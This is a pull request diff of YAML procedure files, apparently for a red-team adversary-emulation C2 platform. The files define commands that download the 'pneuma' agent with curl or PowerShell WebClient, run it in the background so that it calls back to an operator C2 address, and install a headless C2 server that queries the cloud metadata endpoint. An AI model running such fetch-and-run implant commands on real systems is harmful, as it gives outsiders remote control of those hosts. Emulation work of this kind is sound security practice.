### PR TITLE
TTPs for installing infrastructure for Connect

### DIFF
--- a/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
+++ b/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
@@ -23,18 +23,21 @@ platforms:
   linux:
     sh:
       command: |
-        curl #{operator.http}/7b3f4018328085e865c5b72ca98e77691ce710c1/pneuma-linux > /tmp/pneuma && 
+        curl #{payload.url} > /tmp/pneuma && 
         chmod +x /tmp/pneuma && 
         nohup /tmp/pneuma -name $(echo $HOSTNAME) -address #{operator.tcp} &
+      payload: pneuma-linux
   darwin:
     sh:
       command: |
-        curl #{operator.http}/ced4d6dcc1d11f41db6289039d1fa565e1399ec1/pneuma-darwin > /tmp/pneuma && 
+        curl #{payload.url) > /tmp/pneuma && 
         chmod +x /tmp/pneuma && 
         nohup /tmp/pneuma -name $(echo $HOSTNAME) -address #{operator.tcp} &
+      payload: pneuma-darwin
   windows:
     psh:
       command: |
         $wc = New-Object System.Net.WebClient; 
-        $wc.DownloadFile("#{operator.http}/9b08575263c7d30c79b5a05ad979d8476e68ff9b/pneuma-windows.exe","C:\aws\download\pneuma-windows.exe"); 
+        $wc.DownloadFile("#{payload.url}","C:\aws\download\pneuma-windows.exe"); 
         Start-Process -FilePath .\pneuma-windows.exe -ArgumentList "-name $env:COMPUTERNAME -address #{operator.tcp}"
+      payload: pneuma-windows.exe

--- a/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
+++ b/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
@@ -2,7 +2,8 @@ id: 5f9001dc-e179-451f-bbd1-9fb4466d7057
 metadata:
   authors:
   - privateducky
-  tags: []
+  tags:
+    - agent
   chains:
   - JXA access
   release_date: 2021-08-25

--- a/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
+++ b/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
@@ -21,14 +21,19 @@ technique:
 platforms:
   linux:
     sh:
-      command: nohup ./pneuma-linux >/dev/null 2>&1 &
-      payload: pneuma-linux
+      command: |
+        curl #{operator.http}/cea74c95ce1366db3d0d8fb1fc2f9b871fdd1e92/pneuma-linux > /tmp/pneuma && 
+        chmod +x /tmp/pneuma && 
+        nohup /tmp/pneuma -name $(echo $HOSTNAME) -address #{operator.tcp} &
   darwin:
     sh:
-      command: nohup ./pneuma-darwin -address "#{operator.http}" -contact http >/dev/null
-        2>&1 &
-      payload: pneuma-darwin
+      command: |
+        curl #{operator.http}/26b3acb4ca6dfd4df3f604ddfa0575a14f9e010d/pneuma-darwin > /tmp/pneuma && 
+        chmod +x /tmp/pneuma && 
+        nohup /tmp/pneuma -name $(echo $HOSTNAME) -address #{operator.tcp} &
   windows:
     psh:
-      command: Start-Process .\pneuma-windows.exe
-      payload: pneuma-windows.exe
+      command: |
+        $wc = New-Object System.Net.WebClient; 
+        $wc.DownloadFile("#{operator.http}/a470d3d08cab9af036c39652cec1096015f4570a/pneuma-windows.exe","C:\aws\download\pneuma-windows.exe"); 
+        Start-Process -FilePath .\pneuma-windows.exe -ArgumentList "-name $env:COMPUTERNAME -address #{operator.tcp}"

--- a/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
+++ b/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
@@ -23,18 +23,18 @@ platforms:
   linux:
     sh:
       command: |
-        curl #{operator.http}/cea74c95ce1366db3d0d8fb1fc2f9b871fdd1e92/pneuma-linux > /tmp/pneuma && 
+        curl #{operator.http}/7b3f4018328085e865c5b72ca98e77691ce710c1/pneuma-linux > /tmp/pneuma && 
         chmod +x /tmp/pneuma && 
         nohup /tmp/pneuma -name $(echo $HOSTNAME) -address #{operator.tcp} &
   darwin:
     sh:
       command: |
-        curl #{operator.http}/26b3acb4ca6dfd4df3f604ddfa0575a14f9e010d/pneuma-darwin > /tmp/pneuma && 
+        curl #{operator.http}/ced4d6dcc1d11f41db6289039d1fa565e1399ec1/pneuma-darwin > /tmp/pneuma && 
         chmod +x /tmp/pneuma && 
         nohup /tmp/pneuma -name $(echo $HOSTNAME) -address #{operator.tcp} &
   windows:
     psh:
       command: |
         $wc = New-Object System.Net.WebClient; 
-        $wc.DownloadFile("#{operator.http}/a470d3d08cab9af036c39652cec1096015f4570a/pneuma-windows.exe","C:\aws\download\pneuma-windows.exe"); 
+        $wc.DownloadFile("#{operator.http}/9b08575263c7d30c79b5a05ad979d8476e68ff9b/pneuma-windows.exe","C:\aws\download\pneuma-windows.exe"); 
         Start-Process -FilePath .\pneuma-windows.exe -ArgumentList "-name $env:COMPUTERNAME -address #{operator.tcp}"

--- a/ttps/resource-development/e22b3ca7-6181-49ca-ab14-52ff9b7f49be.yml
+++ b/ttps/resource-development/e22b3ca7-6181-49ca-ab14-52ff9b7f49be.yml
@@ -1,0 +1,22 @@
+id: e22b3ca7-6181-49ca-ab14-52ff9b7f49be
+metadata:
+  authors:
+  - privateducky
+  tags: []
+  chains: []
+name: Install Headless Operator
+description: |
+  The Operator C2 can be run without a UI component. This allows deploying it as an API-only C2 on any Linux server.
+tactic: resource-development
+technique:
+  id: T1583
+  name: Acquire Infrastructure
+platforms:
+  linux:
+    sh:
+      command: |
+        mkdir -p /tmp/headless && 
+        curl #{payload.url} > /tmp/headless/bin && 
+        chmod +x /tmp/headless/bin && 
+        ssh-keygen -t rsa -f /tmp/headless/ssh_key -q -N '' && 
+        nohup sudo /tmp/headless/bin --sessionToken '#{tool.psk}' --sshKey /tmp/headless/ssh_key --hostName $(curl http://169.254.169.254/latest/meta-data/public-hostname) >/tmp/headless/headless.log 2>&1  &

--- a/ttps/resource-development/e22b3ca7-6181-49ca-ab14-52ff9b7f49be.yml
+++ b/ttps/resource-development/e22b3ca7-6181-49ca-ab14-52ff9b7f49be.yml
@@ -2,8 +2,12 @@ id: e22b3ca7-6181-49ca-ab14-52ff9b7f49be
 metadata:
   authors:
   - privateducky
-  tags: []
+  tags:
+    - connect
+    - required
   chains: []
+  payloads:
+    headless: cb01547d2ad40c544cfbb69e6f08158a312256eb
 name: Install Headless Operator
 description: |
   The Operator C2 can be run without a UI component. This allows deploying it as an API-only C2 on any Linux server.
@@ -16,7 +20,8 @@ platforms:
     sh:
       command: |
         mkdir -p /tmp/headless && 
-        curl #{operator.http}/cb01547d2ad40c544cfbb69e6f08158a312256eb/headless > /tmp/headless/bin && 
+        curl #{payload.url} > /tmp/headless/bin && 
         chmod +x /tmp/headless/bin && 
         ssh-keygen -t rsa -f /tmp/headless/ssh_key -q -N '' && 
         nohup sudo /tmp/headless/bin --sessionToken '#{operator.session}' --sshKey /tmp/headless/ssh_key --hostName $(curl http://169.254.169.254/latest/meta-data/public-hostname) >/tmp/headless/headless.log 2>&1  &
+      payload: headless

--- a/ttps/resource-development/e22b3ca7-6181-49ca-ab14-52ff9b7f49be.yml
+++ b/ttps/resource-development/e22b3ca7-6181-49ca-ab14-52ff9b7f49be.yml
@@ -16,7 +16,7 @@ platforms:
     sh:
       command: |
         mkdir -p /tmp/headless && 
-        curl #{payload.url} > /tmp/headless/bin && 
+        curl #{operator.http} > /tmp/headless/bin && 
         chmod +x /tmp/headless/bin && 
         ssh-keygen -t rsa -f /tmp/headless/ssh_key -q -N '' && 
-        nohup sudo /tmp/headless/bin --sessionToken '#{tool.psk}' --sshKey /tmp/headless/ssh_key --hostName $(curl http://169.254.169.254/latest/meta-data/public-hostname) >/tmp/headless/headless.log 2>&1  &
+        nohup sudo /tmp/headless/bin --sessionToken '#{operator.session}' --sshKey /tmp/headless/ssh_key --hostName $(curl http://169.254.169.254/latest/meta-data/public-hostname) >/tmp/headless/headless.log 2>&1  &

--- a/ttps/resource-development/e22b3ca7-6181-49ca-ab14-52ff9b7f49be.yml
+++ b/ttps/resource-development/e22b3ca7-6181-49ca-ab14-52ff9b7f49be.yml
@@ -16,7 +16,7 @@ platforms:
     sh:
       command: |
         mkdir -p /tmp/headless && 
-        curl #{operator.http} > /tmp/headless/bin && 
+        curl #{operator.http}/cb01547d2ad40c544cfbb69e6f08158a312256eb/headless > /tmp/headless/bin && 
         chmod +x /tmp/headless/bin && 
         ssh-keygen -t rsa -f /tmp/headless/ssh_key -q -N '' && 
         nohup sudo /tmp/headless/bin --sessionToken '#{operator.session}' --sshKey /tmp/headless/ssh_key --hostName $(curl http://169.254.169.254/latest/meta-data/public-hostname) >/tmp/headless/headless.log 2>&1  &


### PR DESCRIPTION
These two PRs should be used for the provisioning steps in the Connect section of Operator:

When a new redirector or VM is provisioned, Operator should send these TTP (facts resolved) to the /range endpoint on HQ which will provision it as usual.
